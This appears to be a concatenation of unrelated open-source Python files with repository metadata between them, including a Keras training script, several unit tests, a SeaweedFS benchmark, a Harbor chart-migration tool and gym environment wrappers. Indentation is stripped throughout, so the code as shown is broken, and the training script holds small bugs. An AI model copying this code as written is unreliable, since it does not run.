X_meta4 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix4'],params['dataset']['dataset']))
params['cnn']['n_metafeatures4'] = len(X_meta4[0])
else:
X_meta = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (metadata_source,params['dataset']['dataset'])).todense()
params['cnn']['n_metafeatures'] = X_meta.shape[1]
if 'meta-suffix2' in params['dataset']:
X_meta2 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix2'],params['dataset']['dataset']))
params['cnn']['n_metafeatures2'] = X_meta2.shape[1]
if 'meta-suffix3' in params['dataset']:
X_meta3 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix3'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta3[0])
if 'meta-suffix4' in params['dataset']:
X_meta4 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix4'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta4[0])
print(X_meta.shape)
else:
X_meta = None
config = Config(params)
model_dir = os.path.join(common.MODELS_DIR, config.model_id)
common.ensure_dir(common.MODELS_DIR)
common.ensure_dir(model_dir)
model_file = os.path.join(model_dir, config.model_id + common.MODEL_EXT)
logging.debug("Building Network...")
#model = build_model(config)
model = build_model(config)
print(model.summary())
#plot(model, to_file='model2.png', show_shapes=True)
trained_model = config.get_dict()
# Save model
#plot(model, to_file=os.path.join(model_dir, config.model_id + PLOT_EXT))
common.save_model(model, model_file)
logging.debug(trained_model["model_id"])
logging.debug("Loading Data...")
with_generator = True
if only_metadata:
X_train, Y_train, X_val, Y_val, X_test, Y_test = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, metadata_source)
if 'meta-suffix2' in params['dataset']:
X_train2, Y_train2, X_val2, Y_val2, X_test2, Y_test2 = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix2'])
X_train = [X_train,X_train2]
X_val = [X_val,X_val2]
X_test = [X_test,X_test2]
print("X_train bi", len(X_train))
if 'meta-suffix3' in params['dataset']:
X_train3, Y_train3, X_val3, Y_val3, X_test3, Y_test3 = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix3'])
X_train.append(X_train3)
X_val.append(X_val3)
X_test.append(X_test3)
print("X_train tri", len(X_train))
if 'meta-suffix4' in params['dataset']:
X_train4, Y_train4, X_val4, Y_val4, X_test4, Y_test4 = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix4'])
X_train.append(X_train4)
X_val.append(X_val4)
X_test.append(X_test4)
print("X_train four", len(X_train))
else:
if with_generator:
id2gt = dict()
factors = np.load(common.DATASETS_DIR+'/y_train_'+config.y_path+'.npy')
index_factors = open(common.DATASETS_DIR+'/items_index_train_'+params['dataset']['dataset']+'.tsv').read().splitlines()
id2gt = dict((index,factor) for (index,factor) in zip(index_factors,factors))
X_val, Y_val, X_test, Y_test, N_train = load_data_hf5_memory(params,config.training_params["validation"],config.training_params["test"],config.y_path,id2gt,X_meta,config.training_params["val_from_file"])
if params['dataset']['nsamples'] != 'all':
N_train = min(N_train,params['dataset']['nsamples'])
else:
X_train, Y_train, X_val, Y_val, X_test, Y_test, N_train = load_data_hf5(params,config.training_params["validation"],config.training_params["test"])
trained_model["whiten_scaler"] = common.TRAINDATA_DIR+'/scaler_%s.pk' % config.x_path
logging.debug("Training...")
if config.model_arch["final_activation"] == 'softmax':
monitor_metric = 'val_categorical_accuracy'
else:
monitor_metric = 'val_loss'
early_stopping = EarlyStopping(monitor=monitor_metric, patience=4)
if only_metadata:
epochs = model.fit(X_train, Y_train,
batch_size=config.training_params["n_minibatch"],
#shuffle='batch',
nb_epoch=config.training_params["n_epochs"],
verbose=1, validation_data=(X_val, Y_val),
callbacks=[early_stopping])
else:
if with_generator:
print(N_train)
epochs = model.fit_generator(batch_block_generator(params,config.y_path,N_train,id2gt,X_meta,config.training_params["val_from_file"]),
samples_per_epoch = N_train-(N_train % config.training_params["n_minibatch"]),
nb_epoch = config.training_params["n_epochs"],
verbose=1,
validation_data = (X_val, Y_val),
callbacks=[early_stopping])
else:
epochs = model.fit(X_train, Y_train,
batch_size=config.training_params["n_minibatch"],
shuffle='batch',
nb_epoch=config.training_params["n_epochs"],
verbose=1,
validation_data=(X_val, Y_val),
callbacks=[early_stopping])
model.save_weights(os.path.join(model_dir, config.model_id + common.WEIGHTS_EXT))
logging.debug("Saving trained model %s in %s..." %
(trained_model["model_id"], common.DEFAULT_TRAINED_MODELS_FILE))
common.save_trained_model(common.DEFAULT_TRAINED_MODELS_FILE, trained_model)
logging.debug("Evaluating...")
print(X_test[0].shape,X_test[1].shape)
preds=model.predict(X_test)
print(preds.shape)
if params["dataset"]["evaluation"] in ['binary','multiclass']:
y_pred = (preds > 0.5).astype('int32')
acc = accuracy_score(Y_test,y_pred)
prec = precision_score(Y_test,y_pred,average='macro')
recall = recall_score(Y_test,y_pred,average='macro')
f1 = f1_score(Y_test,y_pred,average='macro')
print('Accuracy', acc)
print("%.3f\t%.3f\t%.3f" % (prec,recall,f1))
if params["dataset"]["fact"] == 'class':
good_classes = np.nonzero(Y_test.sum(0))[0]
print(Y_test.shape,preds.shape)
#roc_auc=roc_auc_score(Y_test[:,good_classes],preds[:,good_classes])
#logging.debug('ROC-AUC '+str(roc_auc))
#pr_auc = average_precision_score(Y_test[:,good_classes],preds[:,good_classes])
#print('PR-AUC',pr_auc)
#r2 = roc_auc
elif params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']:
r2s = []
for i,pred in enumerate(preds):
r2 = r2_score(Y_test[i],pred)
r2s.append(r2)
r2 = np.asarray(r2s).mean()
logging.debug('R2 avg '+str(r2))
# Batch prediction
if X_test[1].shape == Y_test[1].shape:
score = model.evaluate(X_test, Y_test, verbose=0)
logging.debug(score)
logging.debug(model.metrics_names)
print(score)
trained_model["loss_score"] = score[0]
trained_model["mse"] = score[1]
if params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']:
trained_model["r2"] = r2
fw=open(common.DATA_DIR+'/results/train_results.txt','a')
fw.write(trained_model["model_id"]+'\n')
if params["training"]["loss_func"] == 'binary_crossentropy':
fw.write('ROC-AUC: '+str(roc_auc)+'\n')
print('ROC-AUC: '+str(roc_auc))
fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')
fw.write('MSE: '+str(score[1])+'\n')
elif params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']:
fw.write('R2 avg: '+str(r2)+'\n')
print('R2 avg: '+str(r2))
fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')
fw.write('MSE: '+str(score[1])+'\n')
fw.write(json.dumps(epochs.history)+"\n\n")
fw.close()
if with_predict:
trained_models = pd.read_csv(common.DEFAULT_TRAINED_MODELS_FILE, sep='\t')
model_config = trained_models[trained_models["model_id"] == trained_model["model_id"]]
model_config = model_config.to_dict(orient="list")
testset = open(common.DATASETS_DIR+'/items_index_test_%s.tsv' % (config.dataset_settings["dataset"])).read().splitlines()
if config.training_params["val_from_file"] and not only_metadata:
predictions, predictions_index = obtain_predictions(model_config, testset, trained_model["model_id"], config.predicting_params["trim_coeff"], model=model, with_metadata=with_metadata, only_metadata=only_metadata, metadata_source=metadata_source, with_patches=True)
else:
predictions, predictions_index = obtain_predictions(model_config, testset, trained_model["model_id"], config.predicting_params["trim_coeff"], model=model, with_metadata=with_metadata, only_metadata=only_metadata, metadata_source=metadata_source)
print("Predictions created")
if with_eval:
do_eval(trained_model["model_id"],get_roc=True,get_map=True,get_p=True,predictions=predictions,predictions_index=predictions_index)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Evaluates the model',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-p',
'--params',
dest="params_file",
help='JSON file with params',
default=False)
parser.add_argument('-pred',
'--predict',
dest="with_predict",
help='Predict factors',
action='store_true',
default=False)
parser.add_argument('-eval',
'--eval',
dest="with_eval",
help='Eval factors',
action='store_true',
default=False)
parser.add_argument('-m',
'--metadata',
dest="with_metadata",
help='Use metadata',
action='store_true',
default=False)
parser.add_argument('-om',
'--only_metadata',
dest="only_metadata",
help='Use only metadata',
action='store_true',
default=False)
parser.add_argument('-ms',
'--metadata_source',
dest="metadata_source",
type=str,
help='Suffix of metadata files',
default="rovi")
args = parser.parse_args()
params = models.params_1
if args.params_file:
params = json.load(open(args.params_file))
process(params)
|
torba/torba/client/errors.py
|
mittalkartik2000/lbry-sdk
| 4,076 |
62699
|
<reponame>mittalkartik2000/lbry-sdk
class InsufficientFundsError(Exception):
pass
|
kafka_influxdb/tests/encoder_test/test_heapster_json_encoder.py
|
gldnspud/kafka-influxdb
| 224 |
62715
|
import unittest
from kafka_influxdb.encoder import heapster_json_encoder
class TestHeapsterJsonEncoder(unittest.TestCase):
def setUp(self):
self.encoder = heapster_json_encoder.Encoder()
def testEncoder(self):
msg = b'{ "MetricsName":"memory/major_page_faults","MetricsValue":{"value":56}, "MetricsTimestamp":"2017-01-19T17:26:00Z", "MetricsTags":{"container_name":"docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d"} } '
encoded_message = self.encoder.encode(msg)
expected_msg = [
'memory/major_page_faults,container_name=docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d value=56 1484846760']
self.assertEqual(encoded_message, expected_msg)
|
hail/python/cluster-tests/cluster-write-many-partitions.py
|
tdeboer-ilmn/hail
| 789 |
62717
|
<gh_stars>100-1000
import hail as hl
ht = hl.utils.range_table(1_000_000, n_partitions=10_000)
# use HDFS so as not to create garbage on GS
ht.write('/tmp/many_partitions.ht')
mt = hl.utils.range_matrix_table(1_000_000, 2, n_partitions=10_000)
mt.write('/tmp/many_partitions.mt')
|
src/dev/steve/Escape_T6/logs/statsDistances.py
|
wvat/NTRTsim
| 148 |
62721
|
""" Prints the min, avg, max of the numbers on each line """
import sys
try:
f = open(sys.argv[1], 'r')
lines = 0
sum = 0
max = 0
min = 9999999
for line in f:
lines += 1
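        # only the value before the first comma on each line is used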
x = float(line.partition(',')[0])
sum += x
if x < min:
min = x
if x > max:
max = x
print "min: " + str(min)
print "avg: " + str((sum / lines))
print "max: " + str(max)
finally:
f.close()
|
tests/unit/test_results.py
|
diadochos/elfi
| 166 |
62722
|
<gh_stars>100-1000
import numpy as np
import pytest
import elfi
def test_sample():
n_samples = 10
parameter_names = ['a', 'b']
distance_name = 'dist'
samples = [
np.random.random(n_samples),
np.random.random(n_samples),
np.random.random(n_samples)
]
outputs = dict(zip(parameter_names + [distance_name], samples))
sample = elfi.methods.results.Sample(
method_name="TestRes",
outputs=outputs,
parameter_names=parameter_names,
discrepancy_name=distance_name,
something='x',
something_else='y',
n_sim=0, )
assert sample.method_name == "TestRes"
assert hasattr(sample, 'samples')
assert sample.n_samples == n_samples
assert sample.dim == len(parameter_names)
assert not sample.is_multivariate
assert np.allclose(samples[0], sample.samples_array[:, 0])
assert np.allclose(samples[1], sample.samples_array[:, 1])
assert np.allclose(samples[-1], sample.discrepancies)
assert hasattr(sample, 'something')
assert sample.something_else == 'y'
with pytest.raises(AttributeError):
sample.not_here
# Test summary
sample.summary()
def test_bolfi_sample():
n_chains = 3
n_iters = 10
warmup = 5
parameter_names = ['a', 'b']
chains = np.random.random((n_chains, n_iters, len(parameter_names)))
result = elfi.methods.results.BolfiSample(
method_name="TestRes",
chains=chains,
parameter_names=parameter_names,
warmup=warmup,
something='x',
something_else='y',
n_sim=0, )
assert result.method_name == "TestRes"
assert hasattr(result, 'samples')
assert hasattr(result, 'chains')
assert hasattr(result, 'outputs')
assert result.n_samples == n_chains * (n_iters - warmup)
assert result.dim == len(parameter_names)
assert not result.is_multivariate
# verify that chains are merged correctly
s0 = np.concatenate([chains[i, warmup:, 0] for i in range(n_chains)])
s1 = np.concatenate([chains[i, warmup:, 1] for i in range(n_chains)])
assert np.allclose(s0, result.samples[parameter_names[0]])
assert np.allclose(s1, result.samples[parameter_names[1]])
assert hasattr(result, 'something')
assert result.something_else == 'y'
@pytest.mark.parametrize('multivariate_model', [3], indirect=True)
def test_multivariate(multivariate_model):
n_samples = 10
rej = elfi.Rejection(multivariate_model['d'], batch_size=5)
sample = rej.sample(n_samples)
assert sample.outputs['t1'].shape == (n_samples, 3)
assert sample.outputs['d'].shape == (n_samples,)
assert sample.is_multivariate
|
Anaconda-files/Program_03a.py
|
arvidl/dynamical-systems-with-applications-using-python
| 106 |
62800
|
<filename>Anaconda-files/Program_03a.py
# Program 03a: Phase portrait of a linear system.
# See Figure 3.8(a).
import matplotlib.pyplot as plt
import numpy as np
from scipy.integrate import odeint
import pylab as pl
# The 2-dimensional linear system
a, b, c, d = 2, 1, 1, 2
def dx_dt(x, t):
return [a*x[0] + b*x[1], c*x[0] + d*x[1]]
# Trajectories in forward time
ts = np.linspace(0, 4, 100)
ic = np.linspace(-1, 1, 5)
for r in ic:
for s in ic:
x0 = [r, s]
xs = odeint(dx_dt, x0, ts)
plt.plot(xs[:, 0], xs[:, 1], 'r-')
# Trajectories in backward time
ts = np.linspace(0, -4, 100)
ic = np.linspace(-1, 1, 5)
for r in ic:
for s in ic:
x0 = [r, s]
xs = odeint(dx_dt, x0, ts)
plt.plot(xs[:, 0], xs[:, 1], 'r-')
# Label the axes and set fontsizes
plt.xlabel('x', fontsize=15)
plt.ylabel('y', fontsize=15)
plt.tick_params(labelsize=15)
plt.xlim(-1, 1)
plt.ylim(-1, 1)
# Plot the vectorfield. See lines 10, 12 for system.
X, Y = np.mgrid[-1:1:10j, -1:1:10j]
u = a*X + b*Y
v = c*X + d*Y
pl.quiver(X, Y, u, v, color='b')
plt.show()
|
zerver/tests/test_thumbnail.py
|
Pulkit007/zulip
| 17,004 |
62815
|
<gh_stars>1000+
from io import StringIO
import orjson
from zerver.lib.test_classes import ZulipTestCase
class ThumbnailTest(ZulipTestCase):
def test_thumbnail_redirect(self) -> None:
self.login("hamlet")
fp = StringIO("zulip!")
fp.name = "zulip.jpeg"
result = self.client_post("/json/user_uploads", {"file": fp})
self.assert_json_success(result)
json = orjson.loads(result.content)
self.assertIn("uri", json)
uri = json["uri"]
base = "/user_uploads/"
self.assertEqual(base, uri[: len(base)])
result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"})
self.assertEqual(result.status_code, 302, result)
self.assertEqual(uri, result.url)
self.login("iago")
result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"})
self.assertEqual(result.status_code, 403, result)
self.assert_in_response("You are not authorized to view this file.", result)
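        # External URLs redirect to the external-content CDN; the trailing path segment is the hex-encoded original URL.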
uri = "https://www.google.com/images/srpr/logo4w.png"
result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
self.assertEqual(result.status_code, 302, result)
base = "https://external-content.zulipcdn.net/external_content/56c362a24201593891955ff526b3b412c0f9fcd2/68747470733a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
self.assertEqual(base, result.url)
uri = "http://www.google.com/images/srpr/logo4w.png"
result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
self.assertEqual(result.status_code, 302, result)
base = "https://external-content.zulipcdn.net/external_content/7b6552b60c635e41e8f6daeb36d88afc4eabde79/687474703a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
self.assertEqual(base, result.url)
uri = "//www.google.com/images/srpr/logo4w.png"
result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
self.assertEqual(result.status_code, 302, result)
base = "https://external-content.zulipcdn.net/external_content/676530cf4b101d56f56cc4a37c6ef4d4fd9b0c03/2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
self.assertEqual(base, result.url)
|
specutils/tests/test_utils.py
|
havok2063/specutils
| 118 |
62823
|
import pickle
import pytest
import numpy as np
from astropy import units as u
from astropy import modeling
from specutils.utils import QuantityModel
from ..utils.wcs_utils import refraction_index, vac_to_air, air_to_vac
wavelengths = [300, 500, 1000] * u.nm
data_index_refraction = {
'Griesen2006': np.array([3.07393068, 2.9434858 , 2.8925797 ]),
'Edlen1953': np.array([2.91557413, 2.78963801, 2.74148172]),
'Edlen1966': np.array([2.91554272, 2.7895973 , 2.74156098]),
'PeckReeder1972': np.array([2.91554211, 2.78960005, 2.74152561]),
'Morton2000': np.array([2.91568573, 2.78973402, 2.74169531]),
'Ciddor1996': np.array([2.91568633, 2.78973811, 2.74166131])
}
def test_quantity_model():
c = modeling.models.Chebyshev1D(3)
uc = QuantityModel(c, u.AA, u.km)
assert uc(10*u.nm).to(u.m) == 0*u.m
def test_pickle_quantity_model(tmp_path):
"""
Check that a QuantityModel can roundtrip through pickling, as it
would if fit in a multiprocessing pool.
"""
c = modeling.models.Chebyshev1D(3)
uc = QuantityModel(c, u.AA, u.km)
pkl_file = tmp_path / "qmodel.pkl"
with open(pkl_file, "wb") as f:
pickle.dump(uc, f)
with open(pkl_file, "rb") as f:
new_model = pickle.load(f)
assert new_model.input_units == uc.input_units
assert new_model.return_units == uc.return_units
assert type(new_model.unitless_model) == type(uc.unitless_model)
assert np.all(new_model.unitless_model.parameters == uc.unitless_model.parameters)
@pytest.mark.parametrize("method", data_index_refraction.keys())
def test_refraction_index(method):
tmp = (refraction_index(wavelengths, method) - 1) * 1e4
assert np.isclose(tmp, data_index_refraction[method], atol=1e-7).all()
@pytest.mark.parametrize("method", data_index_refraction.keys())
def test_air_to_vac(method):
tmp = refraction_index(wavelengths, method)
assert np.isclose(wavelengths.value * tmp,
air_to_vac(wavelengths, method=method, scheme='inversion').value,
rtol=1e-6).all()
assert np.isclose(wavelengths.value,
air_to_vac(vac_to_air(wavelengths, method=method),
method=method, scheme='iteration').value,
atol=1e-12).all()
|
tools/bin/pythonSrc/pychecker-0.8.18/test_input/import37.py
|
YangHao666666/hawq
| 450 |
62846
|
'd'
class Test:
'doc'
def x(self):
import struct
print struct
|
unmaintain/benchmark/benchmark_seaweedfs.py
|
zuzhi/rssant
| 1,176 |
62985
|
import aiohttp
import asyncio
import os
import sys
import time
import random
import contextlib
seaweedfs_url = 'http://127.0.0.1:9081'
def random_content():
return os.urandom(random.randint(1, 10) * 1024)
def random_fid(volumes):
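    # A SeaweedFS fid has the form "<volume_id>,<file_key_hex><cookie_hex>": pick a random volume and a random 24-bit file key with a fixed all-zero cookie.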
volume_id = random.choice(volumes)
file_key = random.randint(0, 1 << 24)
file_key_hex = '%x' % file_key
cookie_hex = '00000000'
return f'{volume_id},{file_key_hex}{cookie_hex}'
class Reporter:
def __init__(self):
self.items = []
@contextlib.contextmanager
def report(self):
t0 = time.monotonic()
yield
value = time.monotonic() - t0
self.items.append(value * 1000)
def summary(self, concurrency):
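        # Latencies are recorded in ms; report the mean, p50/p80/p90/p95/p99 percentiles, and an approximate QPS derived from the mean latency and the concurrency.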
n = len(self.items)
s = sum(self.items)
avg = s / n if n > 0 else 0
s_items = list(sorted(self.items))
result = [f'avg={avg:.1f}']
p_s = [0.5, 0.8, 0.9, 0.95, 0.99]
if n > 0:
for p in p_s:
v = s_items[int(n * p)]
result.append('p{}={:.1f}'.format(int(p * 100), v))
qps = (1000 / avg) * concurrency
result.append(f'qps={qps:.0f}')
print(' '.join(result))
self.items = []
READER_REPORTER = Reporter()
WRITER_REPORTER = Reporter()
async def put(session, fid: str, content: bytes):
url = f'{seaweedfs_url}/{fid}'
data = aiohttp.FormData()
data.add_field(
'file',
content,
content_type='application/gzip'
)
async with session.put(url, data=data) as response:
result = await response.read()
return response.status, result
async def get(session, fid: str):
url = f'{seaweedfs_url}/{fid}'
async with session.get(url) as response:
result = await response.read()
return response.status, result
async def reader_task(session, fid_s, n):
fid_s = list(fid_s)
random.shuffle(fid_s)
for fid in fid_s:
with READER_REPORTER.report():
status, r = await get(session, fid)
assert status == 200, (status, r)
async def writer_task(session, fid_s, n):
fid_s = list(fid_s)
random.shuffle(fid_s)
for fid in fid_s:
content = random_content()
with WRITER_REPORTER.report():
status, r = await put(session, fid, content)
assert status in (200, 201, 204), (status, r)
async def benchmark(session, num_volume, num_fid, num_round, concurrency):
volumes = list(range(20, 20 + num_volume))
fid_s_s = []
for i in range(concurrency):
fid_s = [random_fid(volumes) for _ in range(num_fid // concurrency)]
fid_s_s.append(fid_s)
loop = asyncio.get_event_loop()
for n in range(num_round):
print(f'{n} ' + '-' * 60)
writer_tasks = []
for i in range(concurrency):
t = writer_task(session, fid_s_s[i], num_round)
writer_tasks.append(loop.create_task(t))
await asyncio.gather(*writer_tasks)
WRITER_REPORTER.summary(concurrency)
reader_tasks = []
for i in range(concurrency):
t = reader_task(session, fid_s_s[i], num_round)
reader_tasks.append(loop.create_task(t))
await asyncio.gather(*reader_tasks)
READER_REPORTER.summary(concurrency)
async def async_main(num_volume, concurrency):
print(f'num_volume={num_volume} concurrency={concurrency}')
async with aiohttp.ClientSession() as session:
await benchmark(
session,
num_fid=1000,
num_round=3,
num_volume=num_volume,
concurrency=concurrency,
)
def main():
num_volume = int(sys.argv[1])
concurrency = int(sys.argv[2])
loop = asyncio.get_event_loop()
loop.run_until_complete(async_main(num_volume, concurrency))
if __name__ == "__main__":
main()
|
tools/migrate_chart/migrate_chart.py
|
kschu91/harbor
| 12,706 |
63034
|
#!/usr/local/bin/python3
import subprocess
import signal
import sys
from pathlib import Path
import click
import requests
MIGRATE_CHART_SCRIPT = '/migrate_chart.sh'
HELM_CMD = '/linux-amd64/helm'
CA_UPDATE_CMD = 'update-ca-certificates'
CHART_URL_PATTERN = "https://{host}/api/v2.0/projects/{project}/repositories/{name}/artifacts/{version}"
CHART_SOURCE_DIR = Path('/chart_storage')
errs = []
def print_exist_errs():
if errs:
click.echo("Following errors exist", err=True)
for e in errs:
click.echo(e, err=True)
def graceful_exit(signum, frame):
print_exist_errs()
sys.exit()
signal.signal(signal.SIGINT, graceful_exit)
signal.signal(signal.SIGTERM, graceful_exit)
class ChartV2:
def __init__(self, filepath:Path):
self.filepath = filepath
self.project = self.filepath.parts[-2]
parts = self.filepath.stem.split('-')
flag = False
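        # Scan the dash-separated stem right to left: the first token that starts with a digit marks where the version begins (e.g. "mychart-1.2.3" -> name "mychart", version "1.2.3").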
for i in range(len(parts)-1, -1, -1):
if parts[i][0].isnumeric():
self.name, self.version = '-'.join(parts[:i]), '-'.join(parts[i:])
flag = True
break
if not flag:
raise Exception('chart name: {} is illegal'.format('-'.join(parts)))
def __check_exist(self, hostname, username, password):
return requests.get(CHART_URL_PATTERN.format(
host=hostname,
project=self.project,
name=self.name,
version=self.version),
auth=requests.auth.HTTPBasicAuth(username, password))
def migrate(self, hostname, username, password):
res = self.__check_exist(hostname, username, password)
if res.status_code == 200:
raise Exception("Artifact already exist in harbor")
if res.status_code == 401:
raise Exception(res.reason)
oci_ref = "{host}/{project}/{name}:{version}".format(
host=hostname,
project=self.project,
name=self.name,
version=self.version)
return subprocess.run([MIGRATE_CHART_SCRIPT, HELM_CMD, self.filepath, oci_ref],
text=True, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE)
@click.command()
@click.option('--hostname', default='127.0.0.1', help='the hostname of the harbor instance')
@click.option('--username', default='admin', help='The username to login harbor')
@click.option('--password', default='<PASSWORD>', help='the password to login harbor')
def migrate(hostname, username, password):
"""
Migrate chart v2 to harbor oci registry
"""
if username != 'admin':
raise Exception('This operation only allowed for admin')
subprocess.run([CA_UPDATE_CMD])
subprocess.run([HELM_CMD, 'registry', 'login', hostname, '--username', username, '--password', password])
charts = [ChartV2(c) for p in CHART_SOURCE_DIR.iterdir() if p.is_dir() for c in p.iterdir() if c.is_file() and c.name != "index-cache.yaml"]
with click.progressbar(charts, label="Migrating chart ...", length=len(charts),
item_show_func=lambda x: "{}/{}:{} total errors: {}".format(x.project, x.name, x.version, len(errs)) if x else '') as bar:
for chart in bar:
try:
result = chart.migrate(hostname, username, password)
if result.stderr:
errs.append("chart: {name}:{version} in {project} has err: {err}".format(
name=chart.name,
version=chart.version,
project=chart.project,
err=result.stderr
))
except Exception as e:
errs.append("chart: {name}:{version} in {project} has err: {err}".format(
name=chart.name,
version=chart.version,
project=chart.project,
err=e))
click.echo("Migration is Done.")
print_exist_errs()
if __name__ == '__main__':
migrate()
|
opal_common/authentication/types.py
|
NateKat/opal
| 367 |
63068
|
from enum import Enum
from typing import Dict, Any
from jwt.algorithms import get_default_algorithms
from cryptography.hazmat._types import (
_PRIVATE_KEY_TYPES,
_PUBLIC_KEY_TYPES,
)
# custom types
PrivateKey = _PRIVATE_KEY_TYPES
PublicKey = _PUBLIC_KEY_TYPES
JWTClaims = Dict[str, Any]
class EncryptionKeyFormat(str, Enum):
"""
represent the supported formats for storing encryption keys.
- PEM (https://en.wikipedia.org/wiki/Privacy-Enhanced_Mail)
- SSH (RFC4716) or short format (RFC4253, section-6.6, explained here: https://coolaj86.com/articles/the-ssh-public-key-format/)
- DER (https://en.wikipedia.org/wiki/X.690#DER_encoding)
"""
pem = 'pem'
ssh = 'ssh'
der = 'der'
# dynamic enum because pyjwt does not define one
# see: https://pyjwt.readthedocs.io/en/stable/algorithms.html for possible values
JWTAlgorithm = Enum('JWTAlgorithm', [(k,k) for k in get_default_algorithms().keys()])
|
bigchaindb/exceptions.py
|
AbhishaB/bigchaindb
| 474 |
63111
|
<filename>bigchaindb/exceptions.py
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
class BigchainDBError(Exception):
"""Base class for BigchainDB exceptions."""
class CriticalDoubleSpend(BigchainDBError):
"""Data integrity error that requires attention"""
|
examples/med_sts_clinical.py
|
anwar1103/semantic-text-similarit
| 167 |
63230
|
<reponame>anwar1103/semantic-text-similarit<filename>examples/med_sts_clinical.py
from semantic_text_similarity.models import ClinicalBertSimilarity
from scipy.stats import pearsonr
model = ClinicalBertSimilarity()
predictions = model.predict([("The patient is sick.", "Grass is green."),
("A prescription of acetaminophen 325 mg was given."," The patient was given Tylenol.")])
print(predictions)
|
Chapter2/ex_2_36.py
|
zxjzxj9/PyTorchIntroduction
| 205 |
63240
|
<gh_stars>100-1000
""" 该代码仅为演示函数签名所用,并不能实际运行
"""
save_info = { # 保存的信息
"iter_num": iter_num, # 迭代步数
"optimizer": optimizer.state_dict(), # 优化器的状态字典
"model": model.state_dict(), # 模型的状态字典
}
# 保存信息
torch.save(save_info, save_path)
# 载入信息
save_info = torch.load(save_path)
optimizer.load_state_dict(save_info["optimizer"])
model.load_state_dict(sae_info["model"])
|
utils/wrappers.py
|
pacificlion/world_models
| 106 |
63252
|
<reponame>pacificlion/world_models
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Environment wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gym
import numpy as np
from PIL import Image
from world_models.utils import nested
class ObservationDict(gym.Wrapper):
"""Changes the observation space to be a dict."""
def __init__(self, env, key='observ'):
self._key = key
self.env = env
def __getattr__(self, name):
return getattr(self.env, name)
@property
def observation_space(self):
spaces = {self._key: self.env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self.env.action_space
def step(self, action):
obs, reward, done, info = self.env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self.env.reset()
obs = {self._key: np.array(obs)}
return obs
class ActionRepeat(gym.Wrapper):
"""Repeats the same action `n` times and returns the last step results."""
def __init__(self, env, n):
super(ActionRepeat, self).__init__(env)
assert n >= 1
self._n = n
def __getattr__(self, name):
return getattr(self.env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._n and not done:
observ, reward, done, info = self.env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class ActionNormalize(gym.Env):
"""Normalizes the action space."""
def __init__(self, env):
self._env = env
self._mask = np.logical_and(
np.isfinite(env.action_space.low), np.isfinite(env.action_space.high))
self._low = np.where(self._mask, env.action_space.low, -1)
self._high = np.where(self._mask, env.action_space.high, 1)
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
low = np.where(self._mask, -np.ones_like(self._low), self._low)
high = np.where(self._mask, np.ones_like(self._low), self._high)
return gym.spaces.Box(low, high, dtype=np.float32)
def step(self, action):
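    # Map actions from the normalized [-1, 1] range back to the environment's [low, high]; unbounded dimensions pass through unchanged.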
original = (action + 1) / 2 * (self._high - self._low) + self._low
original = np.where(self._mask, original, action)
return self._env.step(original)
def reset(self):
return self._env.reset()
def render(self, mode='human'):
return self._env.render(mode=mode)
class MaximumDuration(gym.Wrapper):
"""Force sets `done` after the specified duration."""
def __init__(self, env, duration):
super(MaximumDuration, self).__init__(env)
self._duration = duration
self._step = None
